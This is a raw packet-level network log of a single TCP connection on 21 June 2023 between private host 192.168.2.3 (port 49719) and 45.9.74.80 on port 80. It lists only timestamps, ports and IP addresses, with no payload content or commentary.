Jun 21, 2023 04:27:57.701689005 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701715946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701730967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701770067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701812029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701832056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701872110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701913118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701930046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701963902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701987028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702028036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702068090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702089071 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702132940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702172995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702191114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702219009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702246904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702287912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702330112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702349901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702389956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702430964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702451944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702492952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702534914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702553988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702594995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702645063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702657938 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702692986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702713966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702756882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702805996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702820063 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702861071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702909946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.702924967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702959061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.702982903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703026056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703074932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703088999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703128099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703170061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703186989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703219891 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703243017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703286886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703336000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703349113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703373909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703392982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703423023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703466892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703510046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703528881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703569889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703618050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703632116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703665018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703689098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703732967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703774929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703795910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703835964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703886032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.703898907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703934908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.703957081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704000950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704050064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704062939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704102993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704147100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704166889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704196930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704224110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704288960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704336882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704356909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704396009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704443932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704459906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704492092 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704520941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704569101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704582930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704617977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704641104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704689026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704701900 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704741955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704786062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704813957 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704833031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704873085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704895020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.704910040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704952002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.704971075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705010891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705030918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705071926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705087900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705131054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705174923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705218077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705235004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705272913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705291033 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705315113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705363035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705375910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705415010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705455065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705477953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705517054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705557108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705576897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705605984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705634117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705674887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705717087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705734968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705773115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705812931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705832005 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705873013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705913067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.705929995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705961943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.705986977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706027031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706068039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706085920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706126928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706170082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706188917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706226110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706245899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706286907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706330061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706348896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706388950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706437111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706453085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706497908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706510067 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706556082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706568003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706609964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706624031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706665993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706686020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706727028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706768036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706785917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706826925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706876040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706888914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706922054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.706945896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.706986904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707035065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707046986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707086086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707133055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707145929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707180977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707201004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707242966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707285881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707304001 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707345009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707386017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707403898 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707434893 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707458973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707501888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707541943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707561016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707601070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707640886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707658052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707696915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707715034 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707753897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707796097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707813978 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707854986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707896948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.707915068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707945108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.707973003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708014965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708062887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708075047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708117008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708164930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708178997 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708220959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708239079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708281994 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708311081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708353043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708372116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708401918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708427906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708471060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708512068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708528996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708569050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708612919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708631992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708664894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708688974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708730936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708780050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708792925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708832026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708880901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708893061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708926916 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.708949089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.708991051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.709033966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.709054947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.709099054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.709121943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.709140062 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.709161043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.709170103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.710517883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.722182989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.722297907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.747673035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.747761965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.747812033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.747858047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.747917891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.747955084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.747978926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748013973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748033047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748068094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748116970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748167992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748181105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748234987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748249054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748291969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748334885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748378038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748399973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748437881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748460054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748517036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748529911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748573065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748617887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748663902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748717070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748732090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748760939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748788118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748811007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748857021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748909950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.748940945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.748986959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749033928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749077082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.749094963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.749119997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749165058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749213934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749262094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749310017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749361038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749408007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749455929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749505997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749553919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749603033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749651909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749700069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749748945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749794960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749842882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749890089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749937057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.749989033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750036001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750082970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750130892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750176907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750226021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750274897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750322104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750370026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750417948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750467062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750515938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750560045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750605106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750650883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750694036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750740051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750786066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750830889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750878096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750921965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.750967979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751013041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751055956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751100063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751144886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751188993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751235008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751280069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751322031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751364946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751409054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751454115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751502037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751548052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751594067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751638889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751686096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751730919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751775980 CEST	80	49719	45.9.74.80	192.168.2.3
